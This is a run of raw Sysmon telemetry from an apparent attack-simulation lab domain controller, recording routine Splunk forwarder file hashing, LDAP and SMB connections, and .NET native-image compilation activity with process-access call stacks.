21:03:00.296{4DB9351A-9DDB-60D3-0B00-00000000CF01}628840C:\Windows\system32\lsass.exe{4DB9351A-9DD8-60D3-0100-00000000CF01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x800000000000000019955Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:01.640{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5976CFDC5E8D84F08928C6BBC82676EC,SHA256=42165B69A82CB01B250ED41FC6F92132123E04852698CAC83990A870DCA91B98,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000019954Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:00.357{4DB9351A-9DD8-60D3-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61406-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local445microsoft-ds 354300x800000000000000019953Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:00.357{4DB9351A-9DD8-60D3-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61406-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local445microsoft-ds 354300x800000000000000019952Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:00.252{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local61405-true2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local389ldap 354300x800000000000000019951Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:00.252{4DB9351A-9DDE-60D3-1600-00000000CF01}1292C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetrue2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local61405-true2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local389ldap 354300x800000000000000019950Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:00.244{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61404-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local389ldap 354300x800000000000000019949Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:00.244{4DB9351A-9DDE-60D3-1600-00000000CF01}1292C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61404-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local389ldap 23542300x800000000000000019956Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:02.671{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F4C3532F4E679F0F1D84F0A8451B5D5,SHA256=F81112912A927AE44002BECC8AA175CC2B66900AB44C9024195CD80FC3F8CF2A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019957Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:03.687{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8DC8D9363805161D1E4B110777FB48E,SHA256=0117062EEB719FD4A15D22254373A5D771672E5E4F0DCED5223E9A1E34A2A064,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019959Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:04.687{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B023F65CBBF3C732A12FBF1D88CA1C2C,SHA256=EF0F3ADF08BE3D7F814F8D0369FA46C2F047F19DBD863DC24569035F167FD834,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000019958Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:03.194{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61407-false10.0.1.12-8000- 23542300x800000000000000019960Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:05.734{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D61E8112DFE95B2280F90D39D51AB797,SHA256=6FB0C3D52017ADAD2B16CCA2ACEF107DE68719AEADCBAB66EAA0103515553692,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020045Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:25.750{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD500DA49B27AEACAE95DD23AD601FCB,SHA256=993B020C2A11E1881C5198D3B9D33A60FF2C145A42A3D020BFAF7262EF4FE9F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020048Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:26.750{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=336301D22252CEE6649853DB08FC911E,SHA256=C23A18174AECECD456F4F77AF8023B83F320477AD9246E97AA271E3FC4F870B8,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000020047Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:25.257{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61413-false10.0.1.12-8000- 23542300x800000000000000020046Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:26.125{4DB9351A-9DDD-60D3-1200-00000000CF01}416NT AUTHORITY\LOCAL 
SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=C55377B6E01541D08CBA49948C91AE25,SHA256=B4F042BF166C4D2B49070DCEE216B0A8B4F9990CA0DAB8AF68E019C85B041191,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020050Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:27.766{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3AF4DB7BEA50BF0EC0573DCD3FE0478,SHA256=3B1DD58657A654C5E8FEF45CD27C0C1D56F6EC820AAFFB2E604F7C2277600E98,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020049Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:27.266{4DB9351A-9DDD-60D3-0D00-00000000CF01}9045996C:\Windows\system32\svchost.exe{4DB9351A-9DDD-60D3-1000-00000000CF01}104C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000020052Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:28.797{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=881431F41D774F6D6AE7B026EA3E29BB,SHA256=3708C29507A7EB7580213D48395AB4DCF2A21BDE6E19DE0FA28A2F94B9B07AE4,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000020051Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:26.882{4DB9351A-9DDD-60D3-1200-00000000CF01}416C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruetruefe80:0:0:0:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local546dhcpv6-clienttrueff02:0:0:0:0:0:1:2-547dhcpv6-server 23542300x800000000000000020053Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:29.813{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABE21EA76CB06F62D4D35F9FDF9E38E4,SHA256=A6E49D2B3D10A8E4907121E5F9BC17593CAADE3FD16121C48748D7B167BD770F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020060Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:30.909{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A2-60D3-2A03-00000000CF01}1088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020059Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:30.894{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1A2-60D3-2A03-00000000CF01}1088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020058Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:30.894{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A2-60D3-2A03-00000000CF01}1088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 
23542300x800000000000000020057Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:30.862{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5CE415D14DCB7863CF9038983D67E84,SHA256=744FA084996E2F4E639D2AA15F1DB19F92B9571DDEB1EBCC3096462BEAAA58B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020056Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:30.565{4DB9351A-A198-60D3-2903-00000000CF01}5892NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\3UA6AGWATA\PresentationFramework.ni.dll.auxMD5=8F1FD4778E91747A58145154E17EA5AF,SHA256=5F51126070FAC3B2FE9EFFC6F556531FCF6A24E2CDABA5256662A878DFC9E787,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020055Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:30.565{4DB9351A-A198-60D3-2903-00000000CF01}5892NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\3UA6AGWATA\PresentationFramework.ni.dllMD5=4EB0ACB2849F125982D53B74DBA06226,SHA256=BAB44F496D0350D8D73DD0CC0D493CC1C5F26C6A4959F50CBBDA7560E58A220E,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000020054Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:30.159{4DB9351A-A198-60D3-2903-00000000CF01}5892C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1704-0\PresentationFramework.dll2021-06-23 21:03:30.159 23542300x800000000000000020075Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:31.940{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D524089EAC3C83530DF0C017011D8EB,SHA256=3FF63511DD69335CB909B203A0117B1DA21814AAB65A1B1CAAC9D6AECC6460CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020074Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:31.909{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=28C5202C9B5D84F66FA4AC458DF62E43,SHA256=916474E125A5FE5C59F687DB82F93035E8C2C258A9117C9B21AABA88FDABB72F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020073Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:31.909{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=03FFF3FA5A642A800CAB9BDFF83CC1E2,SHA256=3B9BA50503477D961BE38333B35B870412A5830F340BA4DD47CAD9B32E6A2F7A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020072Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:31.831{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A3-60D3-2D03-00000000CF01}5568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020071Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:31.815{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1A3-60D3-2D03-00000000CF01}5568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020070Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:31.815{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A3-60D3-2D03-00000000CF01}5568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020069Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:31.503{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A3-60D3-2C03-00000000CF01}6400C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020068Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:31.487{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1A3-60D3-2C03-00000000CF01}6400C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020067Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:31.487{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A3-60D3-2C03-00000000CF01}6400C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000020066Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:31.440{4DB9351A-A1A3-60D3-2B03-00000000CF01}5516NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\I84BRTBVVB\PresentationFramework.Aero2.ni.dll.auxMD5=F91789F604526CA841F28F37B68C5E54,SHA256=D5B2D5F63E8CE0DF123D59D3D124C6F6BB12EC49088A40C7E9B911D4428E0027,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000020065Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:31.440{4DB9351A-A1A3-60D3-2B03-00000000CF01}5516NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\I84BRTBVVB\PresentationFramework.Aero2.ni.dllMD5=CA8219EEAD330BD35652A64EF3106037,SHA256=AB51A461375A9F6BD2859F45C7E13E080D1DAD15800AD9EA1958D89507A59BA9,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000020064Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:31.409{4DB9351A-A1A3-60D3-2B03-00000000CF01}5516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\158c-0\PresentationFramework.Aero2.dll2021-06-23 21:03:31.409 10341000x800000000000000020063Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 